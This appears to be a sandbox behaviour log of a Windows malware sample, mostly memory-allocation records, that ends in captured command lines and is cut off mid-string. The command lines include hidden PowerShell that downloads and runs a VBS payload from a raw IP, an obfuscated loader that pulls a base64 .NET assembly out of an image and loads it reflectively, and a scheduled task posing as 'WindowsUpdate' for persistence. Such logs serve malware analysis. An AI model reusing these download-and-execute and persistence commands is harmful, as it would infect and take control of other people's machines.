protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02660000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02750000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2116
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0245a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2116
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02452000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02751000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02752000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0254a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0245b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02542000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02555000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0254c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02543000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02544000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02545000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02546000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02547000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02548000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02549000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Windows\Temp\hkcmd.vbs
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs; Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow }"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.sgnittes/PSS/98.932.49.32//:ptth');$method.Invoke($null, $arguments)"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DU#@$#OQ#@$#v#@$#DU#@$#MQ#@$#w#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#cgB1#@$#G0#@$#c#@$#Bf#@$#H#@$##@$#cgBp#@$#HY#@$#YQB0#@$#GU#@$#LgBq#@$#H#@$##@$#Zw#@$#/#@$#DE#@$#Ng#@$#5#@$#D#@$##@$#NQ#@$#w#@$#DQ#@$#MQ#@$#y#@$#Dk#@$#Jw#@$#7#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#I#@$##@$#9#@$#C#@$##@$#TgBl#@$#Hc#@$#LQBP#@$#GI#@$#agBl#@$#GM#@$#d#@$##@$#g#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#TgBl#@$#HQ#@$#LgBX#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#7#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$##@$#k#@$#Hc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#C4#@$#R#@$#Bv#@$#Hc#@$#bgBs#@$#G8#@$#YQBk#@$#EQ#@$#YQB0#@$#GE#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBV#@$#HI#@$#b#@$##@$#p#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#EU#@$#bgBj#@$#G8#@$#Z#@$#Bp#@$#G4#@$#ZwBd#@$#Do#@$#OgBV#@$#FQ#@$#Rg#@$#4#@$#C4#@$#RwBl#@$#HQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBC#@$#Hk#@$#d#@$#Bl#@$#HM#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBT#@$#FQ#@$#QQBS#@$#FQ#@$#Pg#@$#+#@$#Cc#@$#Ow#@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBF#@$#E4#@$#R#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C4#@$#SQBu#@$#GQ#@$#ZQB4#@$#E8#@$#Zg#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bl#@$#G4#@$#Z#@$#BG#@$#Gw#@$#YQBn#@$#Ck#@$#Ow#@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#ZQ#@$#g#@$#D#@$##@$#I#@$##@$#t#@$#GE#@$#bgBk#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#d#@$##@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#Cs#@$#PQ#@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#LgBM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#7#@$#CQ#@$#YgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#T#@$#Bl#@$#G4#@$#ZwB0#@$#Gg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBT#@$#HU#@$#YgBz#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#s#@$#C#@$##@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#p#@$#Ds#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#QwBv#@$#G4#@$#dgBl#@$#HI#@$#d#@$#Bd#@$#Do#@$#OgBG#@$#HI#@$#bwBt#@$#EI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#FM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#Ck#@$#Ow#@$#k#@$#Gw#@$#bwBh#@$#GQ#@$#ZQBk#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQ#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#UgBl#@$#GY#@$#b#@$#Bl#@$#GM#@$#d#@$#Bp#@$#G8#@$#bg#@$#u#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQBd#@$#Do#@$#OgBM#@$#G8#@$#YQBk#@$#Cg#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C4#@$#RwBl#@$#HQ#@$#V#@$#B5#@$#H#@$##@$#ZQ#@$#o#@$#Cc#@$#RgBp#@$#GI#@$#ZQBy#@$#C4#@$#S#@$#Bv#@$#G0#@$#ZQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#d#@$#B5#@$#H#@$##@$#ZQ#@$#u#@$#Ec#@$#ZQB0#@$#E0#@$#ZQB0#@$#Gg#@$#bwBk#@$#Cg#@$#JwBW#@$#EE#@$#SQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#GE#@$#cgBn#@$#HU#@$#bQBl#@$#G4#@$#d#@$#Bz#@$#C#@$##@$#PQ#@$#g#@$#Cw#@$#K#@$##@$#n#@$#HQ#@$#e#@$#B0#@$#C4#@$#cwBn#@$#G4#@$#aQB0#@$#HQ#@$#ZQBz#@$#C8#@$#U#@$#BT#@$#FM#@$#Lw#@$#5#@$#Dg#@$#Lg#@$#5#@$#DM#@$#Mg#@$#u#@$#DQ#@$#OQ#@$#u#@$#DM#@$#Mg#@$#v#@$#C8#@$#OgBw#@$#HQ#@$#d#@$#Bo#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#LgBJ#@$#G4#@$#dgBv#@$#Gs#@$#ZQ#@$#o#@$#CQ#@$#bgB1#@$#Gw#@$#b#@$##@$#s#@$#C#@$##@$#J#@$#Bh#@$#HI#@$#ZwB1#@$#G0#@$#ZQBu#@$#HQ#@$#cw#@$#p#@$##@$#==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\Temp\hkcmd.vbs
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs;Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow
cmdline "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs; Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow }"
cmdline powershell -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DU#@$#OQ#@$#v#@$#DU#@$#MQ#@$#w#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#cgB1#@$#G0#@$#c#@$#Bf#@$#H#@$##@$#cgBp#@$#HY#@$#YQB0#@$#GU#@$#LgBq#@$#H#@$##@$#Zw#@$#/#@$#DE#@$#Ng#@$#5#@$#D#@$##@$#NQ#@$#w#@$#DQ#@$#MQ#@$#y#@$#Dk#@$#Jw#@$#7#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#I#@$##@$#9#@$#C#@$##@$#TgBl#@$#Hc#@$#LQBP#@$#GI#@$#agBl#@$#GM#@$#d#@$##@$#g#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#TgBl#@$#HQ#@$#LgBX#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#7#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$##@$#k#@$#Hc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#C4#@$#R#@$#Bv#@$#Hc#@$#bgBs#@$#G8#@$#YQBk#@$#EQ#@$#YQB0#@$#GE#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBV#@$#HI#@$#b#@$##@$#p#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#EU#@$#bgBj#@$#G8#@$#Z#@$#Bp#@$#G4#@$#ZwBd#@$#Do#@$#OgBV#@$#FQ#@$#Rg#@$#4#@$#C4#@$#RwBl#@$#HQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k